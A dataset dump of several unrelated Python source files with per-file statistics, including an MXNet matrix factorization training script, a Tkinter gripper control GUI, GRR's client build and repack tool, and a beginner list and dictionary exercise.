] | null | null | null |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import argparse
import logging
import time
import mxnet as mx
import numpy as np
from get_data import get_movielens_iter, get_movielens_data
from model import matrix_fact_model_parallel_net
logging.basicConfig(level=logging.DEBUG)
parser = argparse.ArgumentParser(description="Run model parallel version of matrix factorization",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--num-epoch', type=int, default=3,
help='number of epochs to train')
parser.add_argument('--batch-size', type=int, default=256,
help='number of examples per batch')
parser.add_argument('--print-every', type=int, default=100,
help='logging interval')
parser.add_argument('--factor-size', type=int, default=128,
help="the factor size of the embedding operation")
parser.add_argument('--num-gpus', type=int, default=2,
help="number of gpus to use")
MOVIELENS = {
'dataset': 'ml-10m',
'train': './ml-10M100K/r1.train',
'val': './ml-10M100K/r1.test',
'max_user': 71569,
'max_movie': 65135,
}
if __name__ == '__main__':
head = '%(asctime)-15s %(message)s'
logging.basicConfig(level=logging.INFO, format=head)
# arg parser
args = parser.parse_args()
logging.info(args)
num_epoch = args.num_epoch
batch_size = args.batch_size
optimizer = 'sgd'
factor_size = args.factor_size
print_every = args.print_every
num_gpus = args.num_gpus
momentum = 0.9
learning_rate = 0.1
# prepare dataset and iterators
max_user = MOVIELENS['max_user']
max_movies = MOVIELENS['max_movie']
get_movielens_data(MOVIELENS['dataset'])
train_iter = get_movielens_iter(MOVIELENS['train'], batch_size)
val_iter = get_movielens_iter(MOVIELENS['val'], batch_size)
# construct the model
net = matrix_fact_model_parallel_net(factor_size, factor_size, max_user, max_movies)
# construct the module
# map the ctx_group attribute to the context assignment
group2ctxs={'dev1':[mx.cpu()]*num_gpus, 'dev2':[mx.gpu(i) for i in range(num_gpus)]}
# Creating a module by passing group2ctxs attribute which maps
# the ctx_group attribute to the context assignment
mod = mx.module.Module(symbol=net, context=[mx.cpu()]*num_gpus, data_names=['user', 'item'],
label_names=['score'], group2ctxs=group2ctxs)
# the initializer used to initialize the parameters
initializer = mx.init.Xavier(factor_type="in", magnitude=2.34)
# the parameters for the optimizer constructor
optimizer_params = {
'learning_rate': learning_rate,
'wd': 1e-4,
'momentum': momentum,
'rescale_grad': 1.0/batch_size}
# use MSE as the metric
metric = mx.gluon.metric.create(['MSE'])
speedometer = mx.callback.Speedometer(batch_size, print_every)
# start training
mod.fit(train_iter,
val_iter,
eval_metric = metric,
num_epoch = num_epoch,
optimizer = optimizer,
optimizer_params = optimizer_params,
initializer = initializer,
batch_end_callback = speedometer)
| 36.881818
| 98
| 0.682031
| 529
| 4,057
| 5.073724
| 0.402647
| 0.023472
| 0.031669
| 0.011923
| 0.07228
| 0.031297
| 0.031297
| 0.031297
| 0
| 0
| 0
| 0.018354
| 0.221099
| 4,057
| 109
| 99
| 37.220183
| 0.831013
| 0.278777
| 0
| 0
| 0
| 0
| 0.15528
| 0.007246
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.107692
| 0
| 0.107692
| 0.046154
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fea4ed769af71f922b55fc3fe0ad5f2f54ffbfef
| 762
|
py
|
Python
|
scripts/libfranka_gui_gripper_run.py
|
nbfigueroa/franka_interactive_controllers
|
7befdd5fbaa3c7a83b931292fab39ab98754a60c
|
[
"MIT"
] | 6
|
2021-12-08T09:32:57.000Z
|
2022-03-20T09:22:29.000Z
|
scripts/libfranka_gui_gripper_run.py
|
nbfigueroa/franka_interactive_controllers
|
7befdd5fbaa3c7a83b931292fab39ab98754a60c
|
[
"MIT"
] | null | null | null |
scripts/libfranka_gui_gripper_run.py
|
nbfigueroa/franka_interactive_controllers
|
7befdd5fbaa3c7a83b931292fab39ab98754a60c
|
[
"MIT"
] | 3
|
2022-02-01T12:30:47.000Z
|
2022-03-24T10:31:04.000Z
|
#!/usr/bin/env python3
import shlex
from tkinter import *
from tkinter import messagebox
from psutil import Popen
top = Tk()
top.title("Franka Gripper Control")
top.geometry("300x75")
def open():
node_process = Popen(shlex.split('rosrun franka_interactive_controllers libfranka_gripper_run 1'))
messagebox.showinfo("Open Gripper", "Gripper Opened")
node_process.terminate()
def close():
node_process = Popen(shlex.split('rosrun franka_interactive_controllers libfranka_gripper_run 0'))
messagebox.showinfo("Close Gripper", "Gripper Closed")
node_process.terminate()
B1 = Button(top, text = "Open Gripper", command = open)
B1.place(x = 30,y = 20)
B2 = Button(top, text = "Close Gripper", command = close)
B2.place(x = 160,y = 20)
top.mainloop()
| 25.4
| 99
| 0.745407
| 105
| 762
| 5.295238
| 0.457143
| 0.079137
| 0.061151
| 0.07554
| 0.284173
| 0.284173
| 0.284173
| 0.284173
| 0.284173
| 0.284173
| 0
| 0.031627
| 0.128609
| 762
| 29
| 100
| 26.275862
| 0.805723
| 0.027559
| 0
| 0.1
| 0
| 0
| 0.308108
| 0.137838
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0.2
| 0
| 0.3
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fea64ce26f29e53484b8013f735f948fef203460
| 12,293
|
py
|
Python
|
client/client_build.py
|
patriotemeritus/grr
|
bf2b9268c8b9033ab091e27584986690438bd7c3
|
[
"Apache-2.0"
] | 1
|
2015-06-24T09:07:20.000Z
|
2015-06-24T09:07:20.000Z
|
client/client_build.py
|
patriotemeritus/grr
|
bf2b9268c8b9033ab091e27584986690438bd7c3
|
[
"Apache-2.0"
] | 3
|
2020-02-11T22:29:15.000Z
|
2021-06-10T17:44:31.000Z
|
client/client_build.py
|
wandec/grr
|
7fb7e6d492d1325a5fe1559d3aeae03a301c4baa
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
"""This tool builds or repacks the client binaries.
This handles invocations for the build across the supported platforms including
handling Visual Studio, pyinstaller and other packaging mechanisms.
"""
import logging
import os
import platform
import time
# pylint: disable=unused-import
from grr.client import client_plugins
# pylint: enable=unused-import
from grr.lib import build
from grr.lib import builders
from grr.lib import config_lib
from grr.lib import flags
from grr.lib import startup
parser = flags.PARSER
# Guess which arch we should be building based on where we are running.
if platform.architecture()[0] == "32bit":
default_arch = "i386"
else:
default_arch = "amd64"
default_platform = platform.system().lower()
parser.add_argument(
"--platform", choices=["darwin", "linux", "windows"],
default=default_platform,
help="The platform to build or repack for. This will default to "
"the current platform: %s." % platform.system())
parser.add_argument(
"--arch", choices=["amd64", "i386"],
default=default_arch,
help="The architecture to build or repack for.")
# Guess which package format we should be building based on where we are
# running.
if default_platform == "linux":
distro = platform.linux_distribution()[0]
if distro in ["Ubuntu", "debian"]:
default_package = "deb"
elif distro in ["CentOS Linux", "CentOS", "centos", "redhat", "fedora"]:
default_package = "rpm"
else:
default_package = None
elif default_platform == "darwin":
default_package = "dmg"
elif default_platform == "windows":
default_package = "exe"
parser.add_argument(
"--package_format", choices=["deb", "rpm"],
default=default_package,
help="The packaging format to use when building a Linux client.")
# Initialize sub parsers and their arguments.
subparsers = parser.add_subparsers(
title="subcommands", dest="subparser_name", description="valid subcommands")
# Build arguments.
parser_build = subparsers.add_parser(
"build", help="Build a client from source.")
parser_repack = subparsers.add_parser(
"repack", help="Repack a zip file into an installer (Only useful when "
"signing).")
parser_repack.add_argument("--template", default=None,
help="The template zip file to repack.")
parser_repack.add_argument("--output", default=None,
help="The path to write the output installer.")
parser_repack.add_argument("--outputdir", default="",
help="The directory to which we should write the "
"output installer. Installers will be named "
"automatically from config options. Incompatible"
" with --output")
parser_repack.add_argument("--debug_build", action="store_true", default=False,
help="Create a debug client.")
parser_repack.add_argument("-p", "--plugins", default=[], nargs="+",
help="Additional python files that will be loaded "
"as custom plugins.")
parser_deploy = subparsers.add_parser(
"deploy", help="Build a deployable self installer from a package.")
parser_deploy.add_argument("--template", default=None,
help="The template zip file to deploy.")
parser_deploy.add_argument("--templatedir", default="",
help="Directory containing template zip files to "
"repack. Incompatible with --template")
parser_deploy.add_argument("--output", default=None,
help="The path to write the output installer.")
parser_deploy.add_argument("--outputdir", default="",
help="The directory to which we should write the "
"output installer. Installers will be named "
"automatically from config options. Incompatible"
" with --output")
parser_deploy.add_argument("-p", "--plugins", default=[], nargs="+",
help="Additional python files that will be loaded "
"as custom plugins.")
parser_deploy.add_argument("--debug_build", action="store_true", default=False,
help="Create a debug client.")
parser_buildanddeploy = subparsers.add_parser(
"buildanddeploy",
help="Build and deploy clients for multiple labels and architectures.")
parser_buildanddeploy.add_argument("--template", default=None,
help="The template zip file to repack, if "
"none is specified we will build it.")
args = parser.parse_args()
def GetBuilder(context):
"""Get the appropriate builder based on the selected flags."""
try:
if args.platform == "darwin":
context = ["Platform:Darwin"] + context
builder_obj = builders.DarwinClientBuilder
elif args.platform == "windows":
context = ["Platform:Windows"] + context
builder_obj = builders.WindowsClientBuilder
elif args.platform == "linux":
if args.package_format == "deb":
context = ["Platform:Linux"] + context
builder_obj = builders.LinuxClientBuilder
elif args.package_format == "rpm":
context = ["Platform:Linux", "Target:LinuxRpm"] + context
builder_obj = builders.CentosClientBuilder
else:
parser.error("Couldn't guess packaging format for: %s" %
platform.linux_distribution()[0])
else:
parser.error("Unsupported build platform: %s" % args.platform)
except AttributeError:
raise RuntimeError("Unable to build for platform %s when running "
"on current platform." % args.platform)
return builder_obj(context=context)
def GetDeployer(context):
"""Get the appropriate client deployer based on the selected flags."""
if args.platform == "darwin":
context = ["Platform:Darwin"] + context
deployer_obj = build.DarwinClientDeployer
elif args.platform == "windows":
context = ["Platform:Windows"] + context
deployer_obj = build.WindowsClientDeployer
elif args.platform == "linux":
if args.package_format == "deb":
context = ["Platform:Linux"] + context
deployer_obj = build.LinuxClientDeployer
else:
context = ["Platform:Linux", "Target:LinuxRpm"] + context
deployer_obj = build.CentosClientDeployer
else:
parser.error("Unsupported build platform: %s" % args.platform)
return deployer_obj(context=context)
def TemplateInputFilename(context):
"""Build template file name from config."""
if args.templatedir:
filename = config_lib.CONFIG.Get("PyInstaller.template_filename",
context=context)
return os.path.join(args.templatedir, filename)
return None
def BuildAndDeploy(context):
"""Run build and deploy to create installers."""
# ISO 8601 date
timestamp = time.strftime("%Y-%m-%dT%H:%M:%S%z")
if args.plugins:
config_lib.CONFIG.Set("Client.plugins", args.plugins)
# Output directory like: 2015-02-13T21:48:47-0800/linux_amd64_deb/
spec = "_".join((args.platform, args.arch, args.package_format))
output_dir = os.path.join(config_lib.CONFIG.Get(
"ClientBuilder.executables_path", context=context), timestamp, spec)
# If we weren't passed a template, build one
if args.template:
template_path = args.template
else:
template_path = os.path.join(output_dir, config_lib.CONFIG.Get(
"PyInstaller.template_filename", context=context))
builder_obj = GetBuilder(context)
builder_obj.MakeExecutableTemplate(output_file=template_path)
# Get the list of contexts which we should be building.
context_list = config_lib.CONFIG.Get("ClientBuilder.BuildTargets")
logging.info("Building installers for: %s", context_list)
config_orig = config_lib.CONFIG.ExportState()
deployed_list = []
for deploycontext in context_list:
# Add the settings for this context
for newcontext in deploycontext.split(","):
config_lib.CONFIG.AddContext(newcontext)
context.append(newcontext)
try:
# If the ClientBuilder.target_platforms doesn't match our environment,
# skip.
if not config_lib.CONFIG.MatchBuildContext(args.platform, args.arch,
args.package_format):
continue
deployer = GetDeployer(context)
# Make a nicer filename out of the context string.
context_filename = deploycontext.replace(
"AllPlatforms Context,", "").replace(",", "_").replace(" ", "_")
deployed_list.append(context_filename)
output_filename = os.path.join(
output_dir, context_filename,
config_lib.CONFIG.Get("ClientBuilder.output_filename",
context=deployer.context))
logging.info("Deploying %s as %s with labels: %s", deploycontext,
config_lib.CONFIG.Get(
"Client.name", context=deployer.context),
config_lib.CONFIG.Get(
"Client.labels", context=deployer.context))
deployer.MakeDeployableBinary(template_path, output_filename)
finally:
# Remove the custom settings for the next deploy
for newcontext in deploycontext.split(","):
context.remove(newcontext)
config_lib.ImportConfigManger(config_orig)
logging.info("Complete, installers for %s are in %s", deployed_list,
output_dir)
def main(_):
"""Launch the appropriate builder."""
config_lib.CONFIG.AddContext(
"ClientBuilder Context",
"Context applied when we run the client builder script.")
startup.ClientInit()
# Make sure we have all the secondary configs since they may be set under the
# ClientBuilder Context
for secondconfig in config_lib.CONFIG["ConfigIncludes"]:
config_lib.CONFIG.LoadSecondaryConfig(secondconfig)
# Use basic console output logging so we can see what is happening.
logger = logging.getLogger()
handler = logging.StreamHandler()
handler.setLevel(logging.INFO)
logger.handlers = [handler]
# The following is used to change the identity of the builder based on the
# target platform.
context = flags.FLAGS.context
if args.arch == "amd64":
context.append("Arch:amd64")
else:
context.append("Arch:i386")
if args.subparser_name == "build":
builder_obj = GetBuilder(context)
builder_obj.MakeExecutableTemplate()
elif args.subparser_name == "repack":
if args.plugins:
config_lib.CONFIG.Set("Client.plugins", args.plugins)
if args.debug_build:
context += ["DebugClientBuild Context"]
deployer = GetDeployer(context)
output_filename = os.path.join(
args.outputdir, config_lib.CONFIG.Get(
"ClientBuilder.output_filename", context=deployer.context))
deployer.RepackInstaller(open(args.template, "rb").read(), args.output or
output_filename)
elif args.subparser_name == "deploy":
if args.plugins:
config_lib.CONFIG.Set("Client.plugins", args.plugins)
if args.debug_build:
context += ["DebugClientBuild Context"]
deployer = GetDeployer(context)
template_path = (args.template or TemplateInputFilename(deployer.context) or
config_lib.CONFIG.Get("ClientBuilder.template_path",
context=deployer.context))
# If neither output filename or output directory is specified,
# use the default location from the config file.
output = None
if args.output:
output = args.output
elif args.outputdir:
# If output filename isn't specified, write to args.outputdir with a
# .deployed extension so we can distinguish it from repacked binaries.
filename = ".".join(
(config_lib.CONFIG.Get("ClientBuilder.output_filename",
context=deployer.context), "deployed"))
output = os.path.join(args.outputdir, filename)
deployer.MakeDeployableBinary(template_path, output)
elif args.subparser_name == "buildanddeploy":
BuildAndDeploy(context)
if __name__ == "__main__":
flags.StartMain(main)
| 35.631884
| 80
| 0.663467
| 1,396
| 12,293
| 5.732092
| 0.217765
| 0.023619
| 0.035616
| 0.022494
| 0.366783
| 0.307048
| 0.291927
| 0.267933
| 0.242939
| 0.215196
| 0
| 0.004875
| 0.232409
| 12,293
| 344
| 81
| 35.735465
| 0.843154
| 0.130318
| 0
| 0.300429
| 0
| 0
| 0.237352
| 0.021441
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021459
| false
| 0
| 0.04721
| 0
| 0.085837
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fea677c9a939d2a74e86aae5f8b7734e53289cfd
| 1,549
|
py
|
Python
|
Greyatom-projects/code.py
|
naveena41/greyatom-python-for-data-science
|
3aa63878ff12e0e8cdf0e63bafe9b4a2c082f7b1
|
[
"MIT"
] | null | null | null |
Greyatom-projects/code.py
|
naveena41/greyatom-python-for-data-science
|
3aa63878ff12e0e8cdf0e63bafe9b4a2c082f7b1
|
[
"MIT"
] | null | null | null |
Greyatom-projects/code.py
|
naveena41/greyatom-python-for-data-science
|
3aa63878ff12e0e8cdf0e63bafe9b4a2c082f7b1
|
[
"MIT"
] | null | null | null |
# --------------
# Code starts here
# Create the lists
class_1 = ['geoffrey hinton', 'andrew ng', 'sebastian raschka', 'yoshu bengio']
class_2 = ['hilary mason', 'carla gentry', 'corinna cortes']
# Concatenate both the strings
new_class = class_1+class_2
print(new_class)
# Append the list
new_class.append('peter warden')
# Print updated list
print(new_class)
# Remove the element from the list
new_class.remove('carla gentry')
# Print the list
print(new_class)
# Create the Dictionary
courses = {"math": 65, "english": 70, "history": 80, "french": 70, "science":60}
# Slice the dict and stores the all subjects marks in variable
total = 65+70+80+70+60
print(total)
# Store the all the subject in one variable `Total`
# Print the total
# Insert percentage formula
percentage =float(total)*(100/500)
# Print the percentage
print(percentage)
# Create the Dictionary
mathematics = {"geoffery hinton" :78, "andrew ng" :95, "sebastian raschka" :65, "yoshua benjio" :50, "hilary mason" :70, "corinna cortes" :66, "peter warden" :75}
topper = max(mathematics,key = mathematics.get)
print(topper)
# Given string
print(topper.split())
# Create variable first_name
first_name = 'andrew'
# Create variable Last_name and store last two element in the list
Last_name ='ng'
# Concatenate the string
full_name = Last_name+' '+first_name
# print the full_name
print(full_name)
# print the name in upper case
certificate_name = full_name.upper()
print(certificate_name)
# Code ends here
| 24.983871
| 163
| 0.701097
| 219
| 1,549
| 4.858447
| 0.415525
| 0.045113
| 0.036654
| 0.028195
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.034728
| 0.182053
| 1,549
| 61
| 164
| 25.393443
| 0.805051
| 0.369916
| 0
| 0.130435
| 0
| 0
| 0.276286
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.391304
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|